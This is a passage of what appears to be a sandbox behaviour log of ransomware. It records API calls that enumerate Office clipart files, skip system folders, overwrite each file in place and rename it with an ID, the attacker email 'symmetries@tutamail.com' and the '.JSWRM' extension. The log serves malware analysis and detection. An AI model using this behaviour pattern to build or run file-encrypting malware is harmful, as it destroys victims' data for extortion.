0x210b70 [0080.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0080.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0080.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105272.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.725] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17728) returned 1 [0080.725] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4540) returned 0x24d210 [0080.726] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4540, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4540, lpOverlapped=0x0) returned 1 [0080.728] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.728] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4540, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4540, lpOverlapped=0x0) returned 1 [0080.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.728] CloseHandle (hObject=0x314) returned 1 [0080.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0080.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0080.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0080.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0080.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0080.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0080.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0080.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0080.729] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105272.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105272.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105272.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0080.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0080.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0080.729] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b28, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105276.WMF", cAlternateFileName="")) returned 1 [0080.729] lstrcmpiW (lpString1="J0105276.WMF", lpString2=".") returned 1 [0080.729] lstrcmpiW (lpString1="J0105276.WMF", lpString2="..") returned 1 [0080.729] lstrcmpiW (lpString1="J0105276.WMF", lpString2="...") returned 1 [0080.729] lstrcmpiW (lpString1="J0105276.WMF", lpString2="windows") returned -1 [0080.729] lstrcmpiW (lpString1="J0105276.WMF", lpString2="recovery") returned -1 [0080.730] lstrcmpiW (lpString1="J0105276.WMF", lpString2="perflogs") returned -1 [0080.730] lstrcmpiW (lpString1="J0105276.WMF", lpString2="documents and settings") returned 1 [0080.730] lstrcmpiW (lpString1="J0105276.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.730] lstrcmpiW (lpString1="J0105276.WMF", lpString2="system volume information") returned -1 [0080.730] lstrcmpiW (lpString1="J0105276.WMF", lpString2="msocache") returned -1 [0080.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105276.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105276.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105276.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0080.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105276.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105276.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105276.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0080.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0080.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0080.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0080.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105276.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.730] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19240) returned 1 [0080.730] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4b20) returned 0x24d210 [0080.730] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4b20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4b20, lpOverlapped=0x0) returned 1 [0080.733] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.733] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4b20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4b20, lpOverlapped=0x0) returned 1 [0080.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.733] CloseHandle (hObject=0x314) returned 1 [0080.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0080.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0080.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0080.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0080.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0080.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0080.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.734] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105276.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105276.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105276.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0080.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0080.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0080.734] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d14, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105280.WMF", cAlternateFileName="")) returned 1 [0080.734] lstrcmpiW (lpString1="J0105280.WMF", lpString2=".") returned 1 [0080.734] lstrcmpiW (lpString1="J0105280.WMF", lpString2="..") returned 1 [0080.734] lstrcmpiW (lpString1="J0105280.WMF", lpString2="...") returned 1 [0080.734] lstrcmpiW (lpString1="J0105280.WMF", lpString2="windows") returned -1 [0080.734] lstrcmpiW (lpString1="J0105280.WMF", lpString2="recovery") returned -1 [0080.734] lstrcmpiW (lpString1="J0105280.WMF", lpString2="perflogs") returned -1 [0080.734] lstrcmpiW (lpString1="J0105280.WMF", lpString2="documents and settings") returned 1 [0080.734] lstrcmpiW (lpString1="J0105280.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.734] lstrcmpiW (lpString1="J0105280.WMF", lpString2="system volume information") returned -1 [0080.735] lstrcmpiW (lpString1="J0105280.WMF", lpString2="msocache") returned -1 [0080.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105280.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105280.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105280.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0080.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105280.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105280.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105280.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0080.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0080.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0080.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0080.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105280.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105280.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.736] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11540) returned 1 [0080.736] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d10) returned 0x24d210 [0080.736] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2d10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2d10, lpOverlapped=0x0) returned 1 [0080.738] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.738] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2d10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2d10, lpOverlapped=0x0) returned 1 [0080.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.738] CloseHandle (hObject=0x314) returned 1 [0080.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0080.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0080.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0080.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0080.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0080.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0080.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0080.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0080.739] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105280.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105280.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105280.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105280.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0080.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0080.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0080.740] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12bc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105282.WMF", cAlternateFileName="")) returned 1 [0080.740] lstrcmpiW (lpString1="J0105282.WMF", lpString2=".") returned 1 [0080.740] lstrcmpiW (lpString1="J0105282.WMF", lpString2="..") returned 1 [0080.740] lstrcmpiW (lpString1="J0105282.WMF", lpString2="...") returned 1 [0080.740] lstrcmpiW (lpString1="J0105282.WMF", lpString2="windows") returned -1 [0080.740] lstrcmpiW (lpString1="J0105282.WMF", lpString2="recovery") returned -1 [0080.740] lstrcmpiW (lpString1="J0105282.WMF", lpString2="perflogs") returned -1 [0080.740] lstrcmpiW (lpString1="J0105282.WMF", lpString2="documents and settings") returned 1 [0080.740] lstrcmpiW (lpString1="J0105282.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.740] lstrcmpiW (lpString1="J0105282.WMF", lpString2="system volume information") returned -1 [0080.740] lstrcmpiW (lpString1="J0105282.WMF", lpString2="msocache") returned -1 [0080.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105282.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105282.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105282.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0080.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105282.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105282.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105282.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0080.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0080.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0080.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0080.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105282.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.741] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4796) returned 1 [0080.741] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12b0) returned 0x205850 [0080.741] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x12b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x12b0, lpOverlapped=0x0) returned 1 [0080.743] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.743] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x12b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x12b0, lpOverlapped=0x0) returned 1 [0080.743] HeapFree (in: 